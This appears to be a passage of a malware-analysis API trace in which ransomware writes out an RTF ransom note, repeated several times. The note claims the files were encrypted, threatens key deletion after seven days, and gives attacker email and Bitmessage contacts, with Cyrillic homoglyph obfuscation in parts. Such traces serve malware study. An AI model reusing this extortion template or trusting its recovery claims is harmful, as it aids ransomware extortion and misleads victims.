nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.172] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.172] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2364cd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x06H\x06*\x06'\x06 ", lpUsedDefaultChar=0x0) returned 8717 [0291.172] WriteFile 